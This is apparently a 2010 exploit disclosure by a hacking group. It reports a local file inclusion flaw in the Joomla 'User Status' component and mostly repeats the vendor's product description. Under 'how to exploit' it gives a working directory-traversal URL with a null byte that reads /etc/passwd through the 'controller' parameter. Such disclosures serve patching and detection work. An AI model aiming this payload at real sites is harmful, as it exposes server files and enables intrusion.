--------------------------------------------------------------------------------- Joomla Component User Status Local File Inclusion --------------------------------------------------------------------------------- Author : Chip D3 Bi0s Group : LatinHackTeam Email & msn : chipdebios@gmail.com Date : 31 March 2010 Critical Lvl : Moderate Impact : Exposure of sensitive information Where : From Remote --------------------------------------------------------------------------- Affected software description: ~~~~~~~~~~~~~~~~~~~~~~~~~~~ Application : User Status version : 1.21.16 Developer : Mo Kelly License : GPL type : Commercial Price : 10.00 USD Date Added : 27 March 2010 Download : http://joomlamo.com/joomlamo/downloads/cat_view/6-other-joomla-components-modules-and-plugins.html Demo : http://cartweberp.joomlamo.com/ Description : The component back end allows the entry of locations. Also assigning users to a location is done in the back end. Users that are not assigned a location do not show up in the User Status Screen. After creating locations and assigning users you may view their status from the front end. Create a menu selection with user User Status component. There is a separate module to allow users to update their status. Another module, "Refresh Page" makes sure that the user status screen accurately reflects users status. A User's status must be updated to change, it will not expire with the user session. -------------- file error : components/com_userstatus/userstatus.php how to exploit http://127.0.0.1/index.php?option=com_userstatus&controller=../../../../../../../../../../etc/passwd%00 ------------------------ +++++++++++++++++++++++++++++++++++++++ [!] Produced in South America +++++++++++++++++++++++++++++++++++++++